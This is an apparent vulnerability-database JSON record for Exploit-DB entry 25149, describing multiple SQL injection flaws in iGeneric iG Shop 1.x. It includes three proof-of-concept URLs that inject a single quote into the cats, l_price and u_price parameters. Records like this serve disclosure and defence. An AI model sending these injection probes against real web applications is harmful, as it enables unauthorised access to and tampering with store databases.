{"id": "EDB-ID:25149", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "iGeneric iG Shop 1.x - Multiple SQL Injections", "description": "", "published": "2005-02-22T00:00:00", "modified": "2005-02-22T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/25149", "reporter": "John Cobb", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-08-16T08:47:04", "viewCount": 11, "enchantments": {"score": {"value": 0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.0}, "_state": {"dependencies": 1661190352, "score": 1661184847}, "_internal": {"score_hash": "0fb79c9b9e501f0b844abf0ea7449117"}, "sourceHref": "https://www.exploit-db.com/download/25149", "sourceData": "source: https://www.securityfocus.com/bid/12627/info\r\n\r\niGeneric iG Shop is reportedly affected by multiple SQL injection vulnerabilities. These issues exist because the application fails to properly sanitize user-supplied input before using them in SQL queries.\r\n\r\nSuccessful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.\r\n\r\nIt is conjectured that all releases of iG Shop are affected by these vulnerabilities; this has not been confirmed. \r\n\r\nThe following proof of concepts are available:\r\nhttp://www.example.com/page.php?page_type=catalog_products&type_id[]=2&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type=catalog_products&cats='\r\n\r\nhttp://www.example.com/page.php?page_type=catalog_products&type_id[]=2&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&search=1&l_price='&u_price=1&Submit=Search\r\n\r\nhttp://www.example.com/page.php?page_type=catalog_products&type_id[]=2&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&search=1&l_price=1&u_price='&Submit=Search ", "osvdbidlist": [], "exploitType": "webapps", "verified": true}